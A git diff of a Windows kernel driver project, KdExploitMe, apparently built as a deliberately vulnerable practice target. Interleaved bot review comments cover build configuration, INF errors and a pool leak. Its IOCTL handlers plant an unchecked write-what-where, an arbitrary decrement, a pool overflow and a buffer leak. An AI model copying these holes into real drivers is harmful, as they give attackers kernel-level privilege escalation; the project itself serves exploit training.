+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Build.0 = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|ARM64.Build.0 = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Build.0 = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.ActiveCfg = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Build.0 = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Deploy.0 = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|ARM64.ActiveCfg = Win7 Debug|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|ARM64.Build.0 = Win7 Debug|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|ARM64.Build.0 = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.Build.0 = Win7 Release|x64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|ARM64.ActiveCfg = Debug|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|ARM64.Build.0 = Debug|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Build.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Deploy.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|x64.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Build.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Deploy.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|x64.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Build.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Deploy.0 = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|x64.ActiveCfg = Debug|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|ARM64.ActiveCfg = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|ARM64.Build.0 = Release|ARM64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.ActiveCfg = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Build.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Deploy.0 = Release|Win32
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.ActiveCfg = Release|x64
+ {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.Build.0 = Release|x64
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
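Review bot: The new ARM64 rows in ProjectConfigurationPlatforms map the Debug solution configuration to a Release project configuration for both driver projects (`{A239482B-…}.Debug|ARM64.ActiveCfg = Win8.1 Release|ARM64` and the matching `{1B88051D-…}` rows), map `Release|ARM64` to `Win7 Release|ARM64` where every other platform maps Release to `Win8.1 Release`, and resolve ExploitDemos' `Win7 Debug|ARM64` to `Release|ARM64`. Selecting Debug|ARM64 in the IDE therefore builds optimized, non-debug binaries, and the Win7/Win8.1 distinction is lost on this platform. If the project files define matching ARM64 configurations (the vcxproj hunk earlier in this diff appears to add debug and release flavours for Windows 7, 8 and 8.1, but its start is outside this view), the rows should read `….Debug|ARM64.ActiveCfg = Win8.1 Debug|ARM64`, `….Release|ARM64.ActiveCfg = Win8.1 Release|ARM64` and `….Win7 Debug|ARM64.ActiveCfg = Debug|ARM64`, with the Build.0 lines updated to match. The ARM64 rows also carry no Deploy.0 entries, unlike Win32 and x64; add them if ARM64 deployment is intended.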
diff --git a/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj b/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj
new file mode 100644
index 0000000..6e54fc3
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/HandleIOCTL.obj differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log
new file mode 100644
index 0000000..d0e0277
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.Build.CppClean.log
@@ -0,0 +1,2 @@
+c:\users\ayush\source\repos\kdexploitme\kdexploitme\arm64\win8.1 release\vc143.pdb
+c:\users\ayush\source\repos\kdexploitme\kdexploitme\arm64\win8.1 release\kdexploitme.tlog\cl.command.1.tlog
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log
new file mode 100644
index 0000000..8feebee
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.log
@@ -0,0 +1 @@
+LINK : fatal error LNK1104: cannot open file 'ntoskrnl.lib'
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj
new file mode 100644
index 0000000..9010d4d
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.obj differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..4eec97f
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.command.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..c0bd0c4
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.read.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..5538588
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/CL.write.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
new file mode 100644
index 0000000..d1e16ab
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-cvtres.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link-rc.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.command.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.read.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog
new file mode 100644
index 0000000..46b134b
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/link.write.1.tlog
@@ -0,0 +1 @@
+ÿþ
\ No newline at end of file
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/unsuccessfulbuild b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.vcxproj.FileListAbsolute.txt b/KdExploitMe/ARM64/Win8.1 Release/KdExploitMe.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb b/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb
new file mode 100644
index 0000000..d4cabec
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1 Release/vc143.pdb differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf
new file mode 100644
index 0000000..bae7fcd
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.inf
@@ -0,0 +1,32 @@
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer = 12/28/2025,11.25.39.263
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTARM64
+
+[Standard.NTARM64]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
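Review bot: The [Version] section leaves `Class=`, `ClassGuid=`, `Provider=` and `CatalogFile=` empty and has no `PnpLockdown=1`, and the KdExploitMe.log added later in this same diff records InfVerif failing on exactly these directives (errors 1234, 1010, 1233, 1324), so the ARM64 package build cannot succeed as committed. At minimum the section needs `Provider=%ManufacturerName%` with a non-empty ManufacturerName string, a real Class/ClassGuid pair (or a primitive-driver layout, as error 1297 suggests), a named catalog such as `CatalogFile=KdExploitMe.cat` (name constructed), and `PnpLockdown=1` so that installed driver files cannot be modified by other applications. This copy sits under an intermediate output directory and is the stampinf result of the source INF the log names as `KdExploitMe\KdExploitMe.inf`; the fix belongs in that source file, and the generated copies under ARM64\ should not be committed.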
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log
new file mode 100644
index 0000000..7e1d600
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.log
@@ -0,0 +1,9 @@
+ Building 'KdExploitMe' with toolset 'WindowsKernelModeDriver10.0' and the 'Desktop' target platform.
+ Stamping ARM64\Win8.1Release\KdExploitMe.inf
+ Stamping [Version] section with DriverVer=12/28/2025,11.25.39.263
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf : error 1297: Device driver does not install on any devices, use primitive driver if this is intended.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1234: Required directive Provider missing, empty, or invalid in [Version] section.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1234: Required directive Class missing, empty, or invalid in [Version] section.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(5-5): error 1324: [Version] section should specify PnpLockdown=1 to prevent external apps from modifying installed driver files.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(8-8): error 1010: Invalid ClassGuid "", expecting {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}.
+C:\Users\ayush\source\repos\KdExploitMe\KdExploitMe\KdExploitMe.inf(11-11): error 1233: Missing directive CatalogFile required for digital signature.
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
new file mode 100644
index 0000000..d1e16ab
--- /dev/null
+++ b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -0,0 +1,2 @@
+PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog
new file mode 100644
index 0000000..c7cf495
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.command.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog
new file mode 100644
index 0000000..d39b3cb
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.read.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog
new file mode 100644
index 0000000..d39b3cb
Binary files /dev/null and b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/stampinf.write.1.tlog differ
diff --git a/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/unsuccessfulbuild b/KdExploitMe/ARM64/Win8.1Release/KdExploitMe.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe/HandleIOCTL.cpp b/KdExploitMe/HandleIOCTL.cpp
index 0581599..c76da3e 100644
--- a/KdExploitMe/HandleIOCTL.cpp
+++ b/KdExploitMe/HandleIOCTL.cpp
@@ -1,113 +1,113 @@
-#pragma once
-
-#include "HandleIOCTL.h"
-
-
-NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy)
-{
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- try
- {
- //Verify that the structure being read is in usermode
- ProbeForRead(dataCopy, sizeof(DATACOPY), sizeof(UCHAR));
- }
- except(EXCEPTION_EXECUTE_HANDLER)
- {
-
- ntStatus = GetExceptionCode();
- goto Cleanup;
- }
-
-
- if (dataCopy->DestLength < dataCopy->SourceLength)
- {
- ntStatus = STATUS_INVALID_BUFFER_SIZE;
- goto Cleanup;
- }
-
- //Vuln: Don't verify where the pointers in the structure are located
- RtlCopyMemory(dataCopy->Dest, dataCopy->Source, dataCopy->SourceLength);
-
-
-Cleanup:
- return ntStatus;
-}
-
-NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data)
-{
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- try
- {
- //Verify that the structure being read is in usermode
- ProbeForRead(data, sizeof(DECADDRESS), sizeof(UCHAR));
- }
- except(EXCEPTION_EXECUTE_HANDLER)
- {
-
- ntStatus = GetExceptionCode();
- goto Cleanup;
- }
-
- if (data->Dec == TRUE)
- {
- (*(data->Value))--;
- }
-
-Cleanup:
- return ntStatus;
-}
-
-NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
- NTSTATUS ntStatus = STATUS_SUCCESS;
-
- PVOID mem = ExAllocatePoolWithTag(Buf->PoolType, Buf->AllocationSize, EXPLOITPOOLTAG);
- if (!mem)
- {
- ntStatus = STATUS_NO_MEMORY;
- goto Error;
- }
-
- RtlCopyMemory(mem, Buf->UserData.Buffer, Buf->UserData.Length * sizeof(WCHAR));
-
-Cleanup:
- return ntStatus;
-
-Error:
- if (mem != NULL)
- {
- ExFreePoolWithTag(mem, EXPLOITPOOLTAG);
- mem = NULL;
- }
-
- goto Cleanup;
-}
-
-NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
- UNREFERENCED_PARAMETER(Irp);
-
- NTSTATUS ntStatus = 0;
-
- if (inBufSize > outBuffSize)
- {
- ntStatus = STATUS_NO_MEMORY;
- goto Cleanup;
- }
-
- RtlCopyMemory(outBuff, inBuf, inBufSize);
-
-Cleanup:
- return ntStatus;
+#pragma once
+
+#include "HandleIOCTL.h"
+
+
+NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ __try
+ {
+ //Verify that the structure being read is in usermode
+ ProbeForRead(dataCopy, sizeof(DATACOPY), sizeof(UCHAR));
+ }
+ __except(EXCEPTION_EXECUTE_HANDLER)
+ {
+
+ ntStatus = GetExceptionCode();
+ goto Cleanup;
+ }
+
+
+ if (dataCopy->DestLength < dataCopy->SourceLength)
+ {
+ ntStatus = STATUS_INVALID_BUFFER_SIZE;
+ goto Cleanup;
+ }
+
+ //Vuln: Don't verify where the pointers in the structure are located
+ RtlCopyMemory(dataCopy->Dest, dataCopy->Source, dataCopy->SourceLength);
+
+
+Cleanup:
+ return ntStatus;
+}
+
+NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ __try
+ {
+ //Verify that the structure being read is in usermode
+ ProbeForRead(data, sizeof(DECADDRESS), sizeof(UCHAR));
+ }
+ __except(EXCEPTION_EXECUTE_HANDLER)
+ {
+
+ ntStatus = GetExceptionCode();
+ goto Cleanup;
+ }
+
+ if (data->Dec == TRUE)
+ {
+ (*(data->Value))--;
+ }
+
+Cleanup:
+ return ntStatus;
+}
+
+NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf)
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+
+ PVOID mem = ExAllocatePoolWithTag(Buf->PoolType, Buf->AllocationSize, EXPLOITPOOLTAG);
+ if (!mem)
+ {
+ ntStatus = STATUS_NO_MEMORY;
+ goto Error;
+ }
+
+ RtlCopyMemory(mem, Buf->UserData.Buffer, Buf->UserData.Length * sizeof(WCHAR));
+
+Cleanup:
+ return ntStatus;
+
+Error:
+ if (mem != NULL)
+ {
+ ExFreePoolWithTag(mem, EXPLOITPOOLTAG);
+ mem = NULL;
+ }
+
+ goto Cleanup;
+}
+
+NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize)
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+ UNREFERENCED_PARAMETER(Irp);
+
+ NTSTATUS ntStatus = 0;
+
+ if (inBufSize > outBuffSize)
+ {
+ ntStatus = STATUS_NO_MEMORY;
+ goto Cleanup;
+ }
+
+ RtlCopyMemory(outBuff, inBuf, inBufSize);
+
+Cleanup:
+ return ntStatus;
}
\ No newline at end of file
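Review bot: OverflowPool never releases `mem` on its success path — after `RtlCopyMemory(mem, Buf->UserData.Buffer, Buf->UserData.Length * sizeof(WCHAR));` control falls into Cleanup and returns with the allocation still live, so every successful IOCTL leaks a pool block tagged EXPLOITPOOLTAG, while the `if (mem != NULL)` free under Error: can never execute because Error: is only reached when the allocation returned NULL. Unless the allocation is deliberately kept alive for the overflow demo, add `ExFreePoolWithTag(mem, EXPLOITPOOLTAG);` after the copy on the success path and drop the dead branch; if it is intentional, a comment such as `// Allocation intentionally not freed: demo keeps the overflowed chunk resident` would save the next reader the same question. The substantive change in this hunk is only the `try`/`except` → `__try`/`__except` restore in WriteWhatWhere and DecAddress; the remaining ~100 lines are line-ending churn, so consider normalizing line endings in a separate commit so the real fix is reviewable. `Leak` also initialises `ntStatus = 0` where its siblings use STATUS_SUCCESS; aligning it is a small consistency fix.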
diff --git a/KdExploitMe/HandleIOCTL.h b/KdExploitMe/HandleIOCTL.h
index fc44f08..2588828 100644
--- a/KdExploitMe/HandleIOCTL.h
+++ b/KdExploitMe/HandleIOCTL.h
@@ -1,11 +1,11 @@
-#pragma once
-
-#include // various NT definitions
-#include "Structures.h"
-
-#define EXPLOITPOOLTAG 'dnwP'
-
-NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy);
-NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data);
-NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf);
+#pragma once
+
+#include // various NT definitions
+#include "Structures.h"
+
+#define EXPLOITPOOLTAG 'dnwP'
+
+NTSTATUS WriteWhatWhere(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDATACOPY dataCopy);
+NTSTATUS DecAddress(PDEVICE_OBJECT DeviceObject, PIRP Irp, PDECADDRESS data);
+NTSTATUS OverflowPool(PDEVICE_OBJECT DeviceObject, PIRP Irp, POVERFLOW_PAGEDPOOL Buf);
NTSTATUS Leak(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID inBuf, ULONG inBufSize, PVOID outBuff, ULONG outBuffSize);
\ No newline at end of file
diff --git a/KdExploitMe/KdExploitMe.cpp b/KdExploitMe/KdExploitMe.cpp
index 68483b8..68fad3b 100644
--- a/KdExploitMe/KdExploitMe.cpp
+++ b/KdExploitMe/KdExploitMe.cpp
@@ -1,386 +1,378 @@
-//
-// Include files.
-//
-
-#include // various NT definitions
-#include
-
-#include "KdExploitMe.h"
-#include "HandleIOCTL.h"
-#include "Structures.h"
-
-#define NT_DEVICE_NAME L"\\Device\\KdExploitMe"
-#define DOS_DEVICE_NAME L"\\DosDevices\\KdExploitMe"
-
-#if DBG
-#define PrettyDbgPrint(_x_) \
- DbgPrint("KdExploitMe.SYS: "); \
- DbgPrint _x_;
-
-#else
-#define PrettyDbgPrint(_x_)
-#endif
-
-//
-// Device driver routine declarations.
-//
-
-DRIVER_INITIALIZE DriverEntry;
-
-_Dispatch_type_(IRP_MJ_CREATE)
-_Dispatch_type_(IRP_MJ_CLOSE)
-DRIVER_DISPATCH DriverCreateClose;
-
-_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
-DRIVER_DISPATCH DriverDeviceControl;
-
-DRIVER_UNLOAD DriverUnloadControl;
-
-VOID
-PrintIrpInfo(
-PIRP Irp
-);
-VOID
-PrintChars(
-_In_reads_(CountChars) PCHAR BufferAddress,
-_In_ size_t CountChars
-);
-
-#ifdef ALLOC_PRAGMA
-#pragma alloc_text( INIT, DriverEntry )
-#pragma alloc_text( PAGE, DriverCreateClose)
-#pragma alloc_text( PAGE, DriverDeviceControl)
-#pragma alloc_text( PAGE, DriverUnloadControl)
-#pragma alloc_text( PAGE, PrintIrpInfo)
-#pragma alloc_text( PAGE, PrintChars)
-#endif // ALLOC_PRAGMA
-
-
-NTSTATUS
-DriverEntry(
-_In_ PDRIVER_OBJECT DriverObject,
-_In_ PUNICODE_STRING RegistryPath
-)
-/*++
-
-Routine Description:
-This routine is called by the Operating System to initialize the driver.
-
-It creates the device object, fills in the dispatch entry points and
-completes the initialization.
-
-Arguments:
-DriverObject - a pointer to the object that represents this device
-driver.
-
-RegistryPath - a pointer to our Services key in the registry.
-
-Return Value:
-STATUS_SUCCESS if initialized; an error otherwise.
-
---*/
-
-{
- NTSTATUS ntStatus;
- UNICODE_STRING ntUnicodeString; // NT Device Name "\Device\WDMDriver"
- UNICODE_STRING ntWin32NameString; // Win32 Name "\DosDevices\IoctlTest"
